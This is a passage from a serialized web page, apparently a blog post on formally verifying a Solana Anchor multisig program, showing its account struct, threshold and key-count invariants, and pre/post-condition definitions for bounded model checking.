members\n}\n",[20609],{"type":28,"tag":98,"props":20610,"children":20611},{"__ignoreMap":7},[20612,20619,20626,20656,20715,20744,20796,20803,20824,20854,20884,20914,20943,20973,21003,21032,21072],{"type":28,"tag":116,"props":20613,"children":20614},{"class":245,"line":246},[20615],{"type":28,"tag":116,"props":20616,"children":20617},{"style":266},[20618],{"type":33,"value":20433},{"type":28,"tag":116,"props":20620,"children":20621},{"class":245,"line":256},[20622],{"type":28,"tag":116,"props":20623,"children":20624},{"style":266},[20625],{"type":33,"value":20441},{"type":28,"tag":116,"props":20627,"children":20628},{"class":245,"line":293},[20629,20634,20638,20642,20647,20651],{"type":28,"tag":116,"props":20630,"children":20631},{"style":370},[20632],{"type":33,"value":20633},"    !",{"type":28,"tag":116,"props":20635,"children":20636},{"style":266},[20637],{"type":33,"value":13379},{"type":28,"tag":116,"props":20639,"children":20640},{"style":370},[20641],{"type":33,"value":141},{"type":28,"tag":116,"props":20643,"children":20644},{"style":266},[20645],{"type":33,"value":20646},"keys",{"type":28,"tag":116,"props":20648,"children":20649},{"style":370},[20650],{"type":33,"value":141},{"type":28,"tag":116,"props":20652,"children":20653},{"style":266},[20654],{"type":33,"value":20655},"is_empty()\n",{"type":28,"tag":116,"props":20657,"children":20658},{"class":245,"line":361},[20659,20663,20668,20672,20676,20680,20685,20689,20694,20698,20703,20707,20711],{"type":28,"tag":116,"props":20660,"children":20661},{"style":370},[20662],{"type":33,"value":15283},{"type":28,"tag":116,"props":20664,"children":20665},{"style":266},[20666],{"type":33,"value":20667}," (self",{"type":28,"tag":116,"props":20669,"children":20670},{"style":370},[20671],{"type":33,"value":141},{"type":28,"tag":116,"props":20673,"children":20674},{"style":266},[20675],{"type":33,"value":20646},{"type":28,"tag":116,"props":20677,"children":20678},{"style":370},[20679],{"type":33,"value":141},{"type":28,"tag":116,"props":20681,"children":20682},{"style":266},[20683],{"type":33,"value":20684},"len() ",{"type":28,"tag":116,"props":20686,"children":20687},{"style":370},[20688],{"type":33,"value":19078},{"type":28,"tag":116,"props":20690,"children":20691},{"style":339},[20692],{"type":33,"value":20693}," u16",{"type":28,"tag":116,"props":20695,"children":20696},{"style":370},[20697],{"type":33,"value":3151},{"type":28,"tag":116,"props":20699,"children":20700},{"style":339},[20701],{"type":33,"value":20702},"MAX",{"type":28,"tag":116,"props":20704,"children":20705},{"style":376},[20706],{"type":33,"value":8500},{"type":28,"tag":116,"props":20708,"children":20709},{"style":339},[20710],{"type":33,"value":13397},{"type":28,"tag":116,"props":20712,"children":20713},{"style":266},[20714],{"type":33,"value":2830},{"type":28,"tag":116,"props":20716,"children":20717},{"class":245,"line":387},[20718,20722,20726,20730,20735,20739],{"type":28,"tag":116,"props":20719,"children":20720},{"style":370},[20721],{"type":33,"value":15283},{"type":28,"tag":116,"props":20723,"children":20724},{"style":266},[20725],{"type":33,"value":20667},{"type":28,"tag":116,"props":20727,"children":20728},{"style":370},[20729],{"type":33,"value":141},{"type":28,"tag":116,"props":20731,"children":20732},{"style":266},[20733],{"type":33,"value":20734},"threshold ",{"type":28,"tag":116,"props":20736,"children":20737},{"style":370},[20738],{"type":33,"value":9611},{"type":28,"tag":116,"props":20740,"children":20741},{"style":266},[20742],{"type":33,"value":20743}," 1)\n",{"type":28,"tag":116,"props":20745,"children":20746},{"class":245,"line":400},[20747,20751,20755,20759,20763,20767,20771,20775,20779,20783,20787,20791],{"type":28,"tag":116,"props":20748,"children":20749},{"style":370},[20750],{"type":33,"value":15283},{"type":28,"tag":116,"props":20752,"children":20753},{"style":266},[20754],{"type":33,"value":20667},{"type":28,"tag":116,"props":20756,"children":20757},{"style":370},[20758],{"type":33,"value":141},{"type":28,"tag":116,"props":20760,"children":20761},{"style":266},[20762],{"type":33,"value":20734},{"type":28,"tag":116,"props":20764,"children":20765},{"style":376},[20766],{"type":33,"value":8513},{"type":28,"tag":116,"props":20768,"children":20769},{"style":339},[20770],{"type":33,"value":13397},{"type":28,"tag":116,"props":20772,"children":20773},{"style":370},[20774],{"type":33,"value":7869},{"type":28,"tag":116,"props":20776,"children":20777},{"style":266},[20778],{"type":33,"value":13463},{"type":28,"tag":116,"props":20780,"children":20781},{"style":370},[20782],{"type":33,"value":141},{"type":28,"tag":116,"props":20784,"children":20785},{"style":266},[20786],{"type":33,"value":20646},{"type":28,"tag":116,"props":20788,"children":20789},{"style":370},[20790],{"type":33,"value":141},{"type":28,"tag":116,"props":20792,"children":20793},{"style":266},[20794],{"type":33,"value":20795},"len())\n",{"type":28,"tag":116,"props":20797,"children":20798},{"class":245,"line":614},[20799],{"type":28,"tag":116,"props":20800,"children":20801},{"style":266},[20802],{"type":33,"value":19922},{"type":28,"tag":116,"props":20804,"children":20805},{"class":245,"line":631},[20806,20810,20815,20820],{"type":28,"tag":116,"props":20807,"children":20808},{"style":376},[20809],{"type":33,"value":13356},{"type":28,"tag":116,"props":20811,"children":20812},{"style":376},[20813],{"type":33,"value":20814}," struct",{"type":28,"tag":116,"props":20816,"children":20817},{"style":339},[20818],{"type":33,"value":20819}," Ms",{"type":28,"tag":116,"props":20821,"children":20822},{"style":266},[20823],{"type":33,"value":1291},{"type":28,"tag":116,"props":20825,"children":20826},{"class":245,"line":665},[20827,20831,20836,20840,20844,20849],{"type":28,"tag":116,"props":20828,"children":20829},{"style":376},[20830],{"type":33,"value":20506},{"type":28,"tag":116,"props":20832,"children":20833},{"style":272},[20834],{"type":33,"value":20835}," threshold",{"type":28,"tag":116,"props":20837,"children":20838},{"style":370},[20839],{"type":33,"value":4160},{"type":28,"tag":116,"props":20841,"children":20842},{"style":339},[20843],{"type":33,"value":20693},{"type":28,"tag":116,"props":20845,"children":20846},{"style":266},[20847],{"type":33,"value":20848},",               ",{"type":28,"tag":116,"props":20850,"children":20851},{"style":250},[20852],{"type":33,"value":20853},"// threshold for signatures\n",{"type":28,"tag":116,"props":20855,"children":20856},{"class":245,"line":713},[20857,20861,20866,20870,20874,20879],{"type":28,"tag":116,"props":20858,"children":20859},{"style":376},[20860],{"type":33,"value":20506},{"type":28,"tag":116,"props":20862,"children":20863},{"style":272},[20864],{"type":33,"value":20865}," authority_index",{"type":28,"tag":116,"props":20867,"children":20868},{"style":370},[20869],{"type":33,"value":4160},{"type":28,"tag":116,"props":20871,"children":20872},{"style":339},[20873],{"type":33,"value":20693},{"type":28,"tag":116,"props":20875,"children":20876},{"style":266},[20877],{"type":33,"value":20878},",         ",{"type":28,"tag":116,"props":20880,"children":20881},{"style":250},[20882],{"type":33,"value":20883},"// index to seed other authorities under this multisig\n",{"type":28,"tag":116,"props":20885,"children":20886},{"class":245,"line":750},[20887,20891,20896,20900,20904,20909],{"type":28,"tag":116,"props":20888,"children":20889},{"style":376},[20890],{"type":33,"value":20506},{"type":28,"tag":116,"props":20892,"children":20893},{"style":272},[20894],{"type":33,"value":20895}," transaction_index",{"type":28,"tag":116,"props":20897,"children":20898},{"style":370},[20899],{"type":33,"value":4160},{"type":28,"tag":116,"props":20901,"children":20902},{"style":339},[20903],{"type":33,"value":17211},{"type":28,"tag":116,"props":20905,"children":20906},{"style":266},[20907],{"type":33,"value":20908},",       ",{"type":28,"tag":116,"props":20910,"children":20911},{"style":250},[20912],{"type":33,"value":20913},"// look up and seed reference for transactions\n",{"type":28,"tag":116,"props":20915,"children":20916},{"class":245,"line":779},[20917,20921,20926,20930,20934,20938],{"type":28,"tag":116,"props":20918,"children":20919},{"style":376},[20920],{"type":33,"value":20506},{"type":28,"tag":116,"props":20922,"children":20923},{"style":272},[20924],{"type":33,"value":20925}," ms_change_index",{"type":28,"tag":116,"props":20927,"children":20928},{"style":370},[20929],{"type":33,"value":4160},{"type":28,"tag":116,"props":20931,"children":20932},{"style":339},[20933],{"type":33,"value":17211},{"type":28,"tag":116,"props":20935,"children":20936},{"style":266},[20937],{"type":33,"value":20878},{"type":28,"tag":116,"props":20939,"children":20940},{"style":250},[20941],{"type":33,"value":20942},"// the last executed/closed transaction\n",{"type":28,"tag":116,"props":20944,"children":20945},{"class":245,"line":796},[20946,20950,20955,20959,20963,20968],{"type":28,"tag":116,"props":20947,"children":20948},{"style":376},[20949],{"type":33,"value":20506},{"type":28,"tag":116,"props":20951,"children":20952},{"style":272},[20953],{"type":33,"value":20954}," bump",{"type":28,"tag":116,"props":20956,"children":20957},{"style":370},[20958],{"type":33,"value":4160},{"type":28,"tag":116,"props":20960,"children":20961},{"style":339},[20962],{"type":33,"value":14300},{"type":28,"tag":116,"props":20964,"children":20965},{"style":266},[20966],{"type":33,"value":20967},",                     ",{"type":28,"tag":116,"props":20969,"children":20970},{"style":250},[20971],{"type":33,"value":20972},"// bump for the multisig seed\n",{"type":28,"tag":116,"props":20974,"children":20975},{"class":245,"line":847},[20976,20980,20985,20989,20993,20998],{"type":28,"tag":116,"props":20977,"children":20978},{"style":376},[20979],{"type":33,"value":20506},{"type":28,"tag":116,"props":20981,"children":20982},{"style":272},[20983],{"type":33,"value":20984}," create_key",{"type":28,"tag":116,"props":20986,"children":20987},{"style":370},[20988],{"type":33,"value":4160},{"type":28,"tag":116,"props":20990,"children":20991},{"style":339},[20992],{"type":33,"value":20520},{"type":28,"tag":116,"props":20994,"children":20995},{"style":266},[20996],{"type":33,"value":20997},",           ",{"type":28,"tag":116,"props":20999,"children":21000},{"style":250},[21001],{"type":33,"value":21002},"// random key(or not) used to seed the multisig pda\n",{"type":28,"tag":116,"props":21004,"children":21005},{"class":245,"line":898},[21006,21010,21015,21019,21023,21027],{"type":28,"tag":116,"props":21007,"children":21008},{"style":376},[21009],{"type":33,"value":20506},{"type":28,"tag":116,"props":21011,"children":21012},{"style":272},[21013],{"type":33,"value":21014}," allow_external_execute",{"type":28,"tag":116,"props":21016,"children":21017},{"style":370},[21018],{"type":33,"value":4160},{"type":28,"tag":116,"props":21020,"children":21021},{"style":339},[21022],{"type":33,"value":11718},{"type":28,"tag":116,"props":21024,"children":21025},{"style":266},[21026],{"type":33,"value":825},{"type":28,"tag":116,"props":21028,"children":21029},{"style":250},[21030],{"type":33,"value":21031},"// allow non-member keys to execute txs\n",{"type":28,"tag":116,"props":21033,"children":21034},{"class":245,"line":907},[21035,21039,21044,21048,21053,21057,21062,21067],{"type":28,"tag":116,"props":21036,"children":21037},{"style":376},[21038],{"type":33,"value":20506},{"type":28,"tag":116,"props":21040,"children":21041},{"style":272},[21042],{"type":33,"value":21043}," keys",{"type":28,"tag":116,"props":21045,"children":21046},{"style":370},[21047],{"type":33,"value":4160},{"type":28,"tag":116,"props":21049,"children":21050},{"style":339},[21051],{"type":33,"value":21052}," Vec",{"type":28,"tag":116,"props":21054,"children":21055},{"style":266},[21056],{"type":33,"value":514},{"type":28,"tag":116,"props":21058,"children":21059},{"style":339},[21060],{"type":33,"value":21061},"Pubkey",{"type":28,"tag":116,"props":21063,"children":21064},{"style":266},[21065],{"type":33,"value":21066},">,            ",{"type":28,"tag":116,"props":21068,"children":21069},{"style":250},[21070],{"type":33,"value":21071},"// keys of the members\n",{"type":28,"tag":116,"props":21073,"children":21074},{"class":245,"line":981},[21075],{"type":28,"tag":116,"props":21076,"children":21077},{"style":266},[21078],{"type":33,"value":406},{"type":28,"tag":29,"props":21080,"children":21081},{},[21082],{"type":33,"value":21083},"Here we are verifying multiple things at once:",{"type":28,"tag":2108,"props":21085,"children":21086},{},[21087,21098,21109,21120],{"type":28,"tag":459,"props":21088,"children":21089},{},[21090,21096],{"type":28,"tag":98,"props":21091,"children":21093},{"className":21092},[],[21094],{"type":33,"value":21095},"!self.keys.is_empty()",{"type":33,"value":21097}," : ensure there is at least one member",{"type":28,"tag":459,"props":21099,"children":21100},{},[21101,21107],{"type":28,"tag":98,"props":21102,"children":21104},{"className":21103},[],[21105],{"type":33,"value":21106},"self.keys.len() \u003C= u16::MAX as usize",{"type":33,"value":21108}," : set an upper limit of 65535 members",{"type":28,"tag":459,"props":21110,"children":21111},{},[21112,21118],{"type":28,"tag":98,"props":21113,"children":21115},{"className":21114},[],[21116],{"type":33,"value":21117},"self.threshold >= 1",{"type":33,"value":21119}," : ensure we always need at least one member to sign (threshold of zero would require no signers!)",{"type":28,"tag":459,"props":21121,"children":21122},{},[21123,21129],{"type":28,"tag":98,"props":21124,"children":21126},{"className":21125},[],[21127],{"type":33,"value":21128},"self.threshold as usize \u003C= self.keys.len()",{"type":33,"value":21130}," : ensure we always have enough potential members to sign; if threshold was greater than the number of keys, no one could sign",{"type":28,"tag":63,"props":21132,"children":21134},{"id":21133},"verification-how-do-we-check-that-our-model-is-correct",[21135],{"type":33,"value":21136},"Verification: How do we check that our model is correct?",{"type":28,"tag":29,"props":21138,"children":21139},{},[21140,21142,21146,21148,21153],{"type":33,"value":21141},"Now that we have defined the specific instruction and account invariants, we need to generate ",{"type":28,"tag":2583,"props":21143,"children":21144},{},[21145],{"type":33,"value":19633},{"type":33,"value":21147}," on which we can run bounded model checking. Our tool does this ",{"type":28,"tag":2583,"props":21149,"children":21150},{},[21151],{"type":33,"value":21152},"automagically",{"type":33,"value":21154}," for anchor-lang programs.",{"type":28,"tag":29,"props":21156,"children":21157},{},[21158,21160,21166,21168,21173,21175,21180,21181,21186,21188,21193,21195,21200,21201,21207,21209,21215,21216,21222],{"type":33,"value":21159},"Specifically, for a given ",{"type":28,"tag":98,"props":21161,"children":21163},{"className":21162},[],[21164],{"type":33,"value":21165},"Context\u003CT>",{"type":33,"value":21167}," with ",{"type":28,"tag":2583,"props":21169,"children":21170},{},[21171],{"type":33,"value":21172},"incoming",{"type":33,"value":21174}," accounts of types (",{"type":28,"tag":98,"props":21176,"children":21178},{"className":21177},[],[21179],{"type":33,"value":20404},{"type":33,"value":4250},{"type":28,"tag":98,"props":21182,"children":21184},{"className":21183},[],[21185],{"type":33,"value":3394},{"type":33,"value":21187},") and ",{"type":28,"tag":2583,"props":21189,"children":21190},{},[21191],{"type":33,"value":21192},"outgoing",{"type":33,"value":21194}," accounts of type (",{"type":28,"tag":98,"props":21196,"children":21198},{"className":21197},[],[21199],{"type":33,"value":3394},{"type":33,"value":4250},{"type":28,"tag":98,"props":21202,"children":21204},{"className":21203},[],[21205],{"type":33,"value":21206},"close",{"type":33,"value":21208},") we define a ",{"type":28,"tag":98,"props":21210,"children":21212},{"className":21211},[],[21213],{"type":33,"value":21214},"pre_condition",{"type":33,"value":10659},{"type":28,"tag":98,"props":21217,"children":21219},{"className":21218},[],[21220],{"type":33,"value":21221},"post_condition",{"type":33,"value":21223}," expression that is a conjunction of all of the incoming and outcoming account invariants:",{"type":28,"tag":29,"props":21225,"children":21226},{},[21227],{"type":28,"tag":98,"props":21228,"children":21230},{"className":21229},[3652,3653],[21231],{"type":28,"tag":116,"props":21232,"children":21234},{"className":21233},[3658],[21235],{"type":28,"tag":116,"props":21236,"children":21238},{"className":21237,"ariaHidden":3664},[3663],[21239,21275],{"type":28,"tag":116,"props":21240,"children":21242},{"className":21241},[3669],[21243,21248,21256,21261,21265,21271],{"type":28,"tag":116,"props":21244,"children":21247},{"className":21245,"style":21246},[3674],"height:0.6833em;",[],{"type":28,"tag":116,"props":21249,"children":21253},{"className":21250,"style":21252},[3680,21251],"mathnormal","margin-right:0.13889em;",[21254],{"type":33,"value":21255},"P",{"type":28,"tag":116,"props":21257,"children":21259},{"className":21258},[3680],[21260],{"type":33,"value":353},{"type":28,"tag":116,"props":21262,"children":21264},{"className":21263,"style":3857},[3759],[],{"type":28,"tag":116,"props":21266,"children":21268},{"className":21267},[3862],[21269],{"type":33,"value":21270},":=",{"type":28,"tag":116,"props":21272,"children":21274},{"className":21273,"style":3857},[3759],[],{"type":28,"tag":116,"props":21276,"children":21278},{"className":21277},[3669],[21279,21284,21423,21427],{"type":28,"tag":116,"props":21280,"children":21283},{"className":21281,"style":21282},[3674],"height:1.2247em;vertical-align:-0.4747em;",[],{"type":28,"tag":116,"props":21285,"children":21288},{"className":21286},[21287],"mop",[21289,21298],{"type":28,"tag":116,"props":21290,"children":21295},{"className":21291,"style":21294},[21287,21292,21293],"op-symbol","small-op","position:relative;top:0em;",[21296],{"type":33,"value":21297},"⋀",{"type":28,"tag":116,"props":21299,"children":21301},{"className":21300},[3695],[21302],{"type":28,"tag":116,"props":21303,"children":21306},{"className":21304},[3700,21305],"vlist-t2",[21307,21411],{"type":28,"tag":116,"props":21308,"children":21310},{"className":21309},[3705],[21311,21404],{"type":28,"tag":116,"props":21312,"children":21315},{"className":21313,"style":21314},[3710],"height:0.2253em;",[21316],{"type":28,"tag":116,"props":21317,"children":21319},{"style":21318},"top:-2.4003em;margin-left:0em;margin-right:0.05em;",[21320,21324],{"type":28,"tag":116,"props":21321,"children":21323},{"className":21322,"style":3720},[3719],[],{"type":28,"tag":116,"props":21325,"children":21327},{"className":21326},[3725,3726,3727,3728],[21328],{"type":28,"tag":116,"props":21329,"children":21331},{"className":21330},[3680,3728],[21332,21337,21343,21353,21359,21368,21377,21383,21388,21393,21398],{"type":28,"tag":116,"props":21333,"children":21335},{"className":21334},[3680,21251,3728],[21336],{"type":33,"value":87},{"type":28,"tag":116,"props":21338,"children":21340},{"className":21339},[3680,21251,3728],[21341],{"type":33,"value":21342},"cc",{"type":28,"tag":116,"props":21344,"children":21346},{"className":21345},[3759,3728],[21347],{"type":28,"tag":116,"props":21348,"children":21350},{"className":21349},[3728],[21351],{"type":33,"value":21352}," ",{"type":28,"tag":116,"props":21354,"children":21356},{"className":21355},[3862,3728],[21357],{"type":33,"value":21358},"∈",{"type":28,"tag":116,"props":21360,"children":21362},{"className":21361},[3759,3728],[21363],{"type":28,"tag":116,"props":21364,"children":21366},{"className":21365},[3728],[21367],{"type":33,"value":21352},{"type":28,"tag":116,"props":21369,"children":21371},{"className":21370},[3680,33,3728],[21372],{"type":28,"tag":116,"props":21373,"children":21375},{"className":21374},[3680,3728],[21376],{"type":33,"value":21172},{"type":28,"tag":116,"props":21378,"children":21381},{"className":21379},[21380,3728],"mopen",[21382],{"type":33,"value":313},{"type":28,"tag":116,"props":21384,"children":21386},{"className":21385},[3680,21251,3728],[21387],{"type":33,"value":1797},{"type":28,"tag":116,"props":21389,"children":21391},{"className":21390},[3680,21251,3728],[21392],{"type":33,"value":1554},{"type":28,"tag":116,"props":21394,"children":21396},{"className":21395},[3680,21251,3728],[21397],{"type":33,"value":18939},{"type":28,"tag":116,"props":21399,"children":21402},{"className":21400},[21401,3728],"mclose",[21403],{"type":33,"value":1829},{"type":28,"tag":116,"props":21405,"children":21408},{"className":21406},[21407],"vlist-s",[21409],{"type":33,"value":21410},"​",{"type":28,"tag":116,"props":21412,"children":21414},{"className":21413},[3705],[21415],{"type":28,"tag":116,"props":21416,"children":21419},{"className":21417,"style":21418},[3710],"height:0.4747em;",[21420],{"type":28,"tag":116,"props":21421,"children":21422},{},[],{"type":28,"tag":116,"props":21424,"children":21426},{"className":21425,"style":3798},[3759],[],{"type":28,"tag":116,"props":21428,"children":21430},{"className":21429},[3680],[21431,21441,21446,21451,21456],{"type":28,"tag":116,"props":21432,"children":21434},{"className":21433},[3680,33],[21435],{"type":28,"tag":116,"props":21436,"children":21438},{"className":21437},[3680],[21439],{"type":33,"value":21440},"invariant",{"type":28,"tag":116,"props":21442,"children":21444},{"className":21443},[21380],[21445],{"type":33,"value":313},{"type":28,"tag":116,"props":21447,"children":21449},{"className":21448},[3680,21251],[21450],{"type":33,"value":87},{"type":28,"tag":116,"props":21452,"children":21454},{"className":21453},[3680,21251],[21455],{"type":33,"value":21342},{"type":28,"tag":116,"props":21457,"children":21459},{"className":21458},[21401],[21460],{"type":33,"value":1829},{"type":28,"tag":29,"props":21462,"children":21463},{},[21464],{"type":28,"tag":98,"props":21465,"children":21467},{"className":21466},[3652,3653],[21468],{"type":28,"tag":116,"props":21469,"children":21471},{"className":21470},[3658],[21472],{"type":28,"tag":116,"props":21473,"children":21475},{"className":21474,"ariaHidden":3664},[3663],[21476,21507],{"type":28,"tag":116,"props":21477,"children":21479},{"className":21478},[3669],[21480,21484,21489,21494,21498,21503],{"type":28,"tag":116,"props":21481,"children":21483},{"className":21482,"style":21246},[3674],[],{"type":28,"tag":116,"props":21485,"children":21487},{"className":21486,"style":21252},[3680,21251],[21488],{"type":33,"value":21255},{"type":28,"tag":116,"props":21490,"children":21492},{"className":21491},[3680],[21493],{"type":33,"value":1824},{"type":28,"tag":116,"props":21495,"children":21497},{"className":21496,"style":3857},[3759],[],{"type":28,"tag":116,"props":21499,"children":21501},{"className":21500},[3862],[21502],{"type":33,"value":21270},{"type":28,"tag":116,"props":21504,"children":21506},{"className":21505,"style":3857},[3759],[],{"type":28,"tag":116,"props":21508,"children":21510},{"className":21509},[3669],[21511,21515,21638,21642],{"type":28,"tag":116,"props":21512,"children":21514},{"className":21513,"style":21282},[3674],[],{"type":28,"tag":116,"props":21516,"children":21518},{"className":21517},[21287],[21519,21524],{"type":28,"tag":116,"props":21520,"children":21522},{"className":21521,"style":21294},[21287,21292,21293],[21523],{"type":33,"value":21297},{"type":28,"tag":116,"props":21525,"children":21527},{"className":21526},[3695],[21528],{"type":28,"tag":116,"props":21529,"children":21531},{"className":21530},[3700,21305],[21532,21627],{"type":28,"tag":116,"props":21533,"children":21535},{"className":21534},[3705],[21536,21622],{"type":28,"tag":116,"props":21537,"children":21539},{"className":21538,"style":21314},[3710],[21540],{"type":28,"tag":116,"props":21541,"children":21542},{"style":21318},[21543,21547],{"type":28,"tag":116,"props":21544,"children":21546},{"className":21545,"style":3720},[3719],[],{"type":28,"tag":116,"props":21548,"children":21550},{"className":21549},[3725,3726,3727,3728],[21551],{"type":28,"tag":116,"props":21552,"children":21554},{"className":21553},[3680,3728],[21555,21560,21565,21574,21579,21588,21597,21602,21607,21612,21617],{"type":28,"tag":116,"props":21556,"children":21558},{"className":21557},[3680,21251,3728],[21559],{"type":33,"value":87},{"type":28,"tag":116,"props":21561,"children":21563},{"className":21562},[3680,21251,3728],[21564],{"type":33,"value":21342},{"type":28,"tag":116,"props":21566,"children":21568},{"className":21567},[3759,3728],[21569],{"type":28,"tag":116,"props":21570,"children":21572},{"className":21571},[3728],[21573],{"type":33,"value":21352},{"type":28,"tag":116,"props":21575,"children":21577},{"className":21576},[3862,3728],[21578],{"type":33,"value":21358},{"type":28,"tag":116,"props":21580,"children":21582},{"className":21581},[3759,3728],[21583],{"type":28,"tag":116,"props":21584,"children":21586},{"className":21585},[3728],[21587],{"type":33,"value":21352},{"type":28,"tag":116,"props":21589,"children":21591},{"className":21590},[3680,33,3728],[21592],{"type":28,"tag":116,"props":21593,"children":21595},{"className":21594},[3680,3728],[21596],{"type":33,"value":21192},{"type":28,"tag":116,"props":21598,"children":21600},{"className":21599},[21380,3728],[21601],{"type":33,"value":313},{"type":28,"tag":116,"props":21603,"children":21605},{"className":21604},[3680,21251,3728],[21606],{"type":33,"value":1797},{"type":28,"tag":116,"props":21608,"children":21610},{"className":21609},[3680,21251,3728],[21611],{"type":33,"value":1554},{"type":28,"tag":116,"props":21613,"children":21615},{"className":21614},[3680,21251,3728],[21616],{"type":33,"value":18939},{"type":28,"tag":116,"props":21618,"children":21620},{"className":21619},[21401,3728],[21621],{"type":33,"value":1829},{"type":28,"tag":116,"props":21623,"children":21625},{"className":21624},[21407],[21626],{"type":33,"value":21410},{"type":28,"tag":116,"props":21628,"children":21630},{"className":21629},[3705],[21631],{"type":28,"tag":116,"props":21632,"children":21634},{"className":21633,"style":21418},[3710],[21635],{"type":28,"tag":116,"props":21636,"children":21637},{},[],{"type":28,"tag":116,"props":21639,"children":21641},{"className":21640,"style":3798},[3759],[],{"type":28,"tag":116,"props":21643,"children":21645},{"className":21644},[3680],[21646,21655,21660,21665,21670],{"type":28,"tag":116,"props":21647,"children":21649},{"className":21648},[3680,33],[21650],{"type":28,"tag":116,"props":21651,"children":21653},{"className":21652},[3680],[21654],{"type":33,"value":21440},{"type":28,"tag":116,"props":21656,"children":21658},{"className":21657},[21380],[21659],{"type":33,"value":313},{"type":28,"tag":116,"props":21661,"children":21663},{"className":21662},[3680,21251],[21664],{"type":33,"value":87},{"type":28,"tag":116,"props":21666,"children":21668},{"className":21667},[3680,21251],[21669],{"type":33,"value":21342},{"type":28,"tag":116,"props":21671,"children":21673},{"className":21672},[21401],[21674],{"type":33,"value":1829},{"type":28,"tag":29,"props":21676,"children":21677},{},[21678],{"type":33,"value":21679},"Our instruction invariants are represented as:",{"type":28,"tag":2108,"props":21681,"children":21682},{},[21683,21719],{"type":28,"tag":459,"props":21684,"children":21685},{},[21686,21713,21714],{"type":28,"tag":98,"props":21687,"children":21689},{"className":21688},[3652,3653],[21690],{"type":28,"tag":116,"props":21691,"children":21693},{"className":21692},[3658],[21694],{"type":28,"tag":116,"props":21695,"children":21697},{"className":21696,"ariaHidden":3664},[3663],[21698],{"type":28,"tag":116,"props":21699,"children":21701},{"className":21700},[3669],[21702,21706],{"type":28,"tag":116,"props":21703,"children":21705},{"className":21704,"style":21246},[3674],[],{"type":28,"tag":116,"props":21707,"children":21710},{"className":21708,"style":21709},[3680,21251],"margin-right:0.05764em;",[21711],{"type":33,"value":21712},"S",{"type":33,"value":14994},{"type":28,"tag":98,"props":21715,"children":21717},{"className":21716},[],[21718],{"type":33,"value":19818},{"type":28,"tag":459,"props":21720,"children":21721},{},[21722,21748,21749],{"type":28,"tag":98,"props":21723,"children":21725},{"className":21724},[3652,3653],[21726],{"type":28,"tag":116,"props":21727,"children":21729},{"className":21728},[3658],[21730],{"type":28,"tag":116,"props":21731,"children":21733},{"className":21732,"ariaHidden":3664},[3663],[21734],{"type":28,"tag":116,"props":21735,"children":21737},{"className":21736},[3669],[21738,21742],{"type":28,"tag":116,"props":21739,"children":21741},{"className":21740,"style":21246},[3674],[],{"type":28,"tag":116,"props":21743,"children":21745},{"className":21744,"style":21709},[3680,21251],[21746],{"type":33,"value":21747},"E",{"type":33,"value":14994},{"type":28,"tag":98,"props":21750,"children":21752},{"className":21751},[],[21753],{"type":33,"value":19825},{"type":28,"tag":29,"props":21755,"children":21756},{},[21757,21759,21786,21788,21793,21795,21801],{"type":33,"value":21758},"And ",{"type":28,"tag":98,"props":21760,"children":21762},{"className":21761},[3652,3653],[21763],{"type":28,"tag":116,"props":21764,"children":21766},{"className":21765},[3658],[21767],{"type":28,"tag":116,"props":21768,"children":21770},{"className":21769,"ariaHidden":3664},[3663],[21771],{"type":28,"tag":116,"props":21772,"children":21774},{"className":21773},[3669],[21775,21779],{"type":28,"tag":116,"props":21776,"children":21778},{"className":21777,"style":21246},[3674],[],{"type":28,"tag":116,"props":21780,"children":21783},{"className":21781,"style":21782},[3680,21251],"margin-right:0.07153em;",[21784],{"type":33,"value":21785},"K",{"type":33,"value":21787}," represents whether the instruction actually succeeds (i.e. invoking the handler returned an ",{"type":28,"tag":98,"props":21789,"children":21791},{"className":21790},[],[21792],{"type":33,"value":20153},{"type":33,"value":21794}," not an ",{"type":28,"tag":98,"props":21796,"children":21798},{"className":21797},[],[21799],{"type":33,"value":21800},"Err",{"type":33,"value":1484},{"type":28,"tag":29,"props":21803,"children":21804},{},[21805],{"type":33,"value":21806},"In order to verify these conditions we need to verify three cases:",{"type":28,"tag":75,"props":21808,"children":21810},{"id":21809},"account-invariants-1",[21811],{"type":33,"value":21812},"Account invariants",{"type":28,"tag":29,"props":21814,"children":21815},{},[21816,21818,21849,21851,21881,21883,21913],{"type":33,"value":21817},"After we execute an instruction, either the function should error and be reverted (",{"type":28,"tag":98,"props":21819,"children":21821},{"className":21820},[3652,3653],[21822],{"type":28,"tag":116,"props":21823,"children":21825},{"className":21824},[3658],[21826],{"type":28,"tag":116,"props":21827,"children":21829},{"className":21828,"ariaHidden":3664},[3663],[21830],{"type":28,"tag":116,"props":21831,"children":21833},{"className":21832},[3669],[21834,21838,21844],{"type":28,"tag":116,"props":21835,"children":21837},{"className":21836,"style":21246},[3674],[],{"type":28,"tag":116,"props":21839,"children":21841},{"className":21840},[3680],[21842],{"type":33,"value":21843},"¬",{"type":28,"tag":116,"props":21845,"children":21847},{"className":21846,"style":21782},[3680,21251],[21848],{"type":33,"value":21785},{"type":33,"value":21850},") or the account post-invariants should hold (",{"type":28,"tag":98,"props":21852,"children":21854},{"className":21853},[3652,3653],[21855],{"type":28,"tag":116,"props":21856,"children":21858},{"className":21857},[3658],[21859],{"type":28,"tag":116,"props":21860,"children":21862},{"className":21861,"ariaHidden":3664},[3663],[21863],{"type":28,"tag":116,"props":21864,"children":21866},{"className":21865},[3669],[21867,21871,21876],{"type":28,"tag":116,"props":21868,"children":21870},{"className":21869,"style":21246},[3674],[],{"type":28,"tag":116,"props":21872,"children":21874},{"className":21873,"style":21252},[3680,21251],[21875],{"type":33,"value":21255},{"type":28,"tag":116,"props":21877,"children":21879},{"className":21878},[3680],[21880],{"type":33,"value":1824},{"type":33,"value":21882},"). Furthermore, we can assume that before executing a function, the account pre-invariants (",{"type":28,"tag":98,"props":21884,"children":21886},{"className":21885},[3652,3653],[21887],{"type":28,"tag":116,"props":21888,"children":21890},{"className":21889},[3658],[21891],{"type":28,"tag":116,"props":21892,"children":21894},{"className":21893,"ariaHidden":3664},[3663],[21895],{"type":28,"tag":116,"props":21896,"children":21898},{"className":21897},[3669],[21899,21903,21908],{"type":28,"tag":116,"props":21900,"children":21902},{"className":21901,"style":21246},[3674],[],{"type":28,"tag":116,"props":21904,"children":21906},{"className":21905,"style":21252},[3680,21251],[21907],{"type":33,"value":21255},{"type":28,"tag":116,"props":21909,"children":21911},{"className":21910},[3680],[21912],{"type":33,"value":353},{"type":33,"value":21914},") should hold since we will verify all of the functions eventually.",{"type":28,"tag":29,"props":21916,"children":21917},{},[21918,21920],{"type":33,"value":21919},"So we are trying to prove that 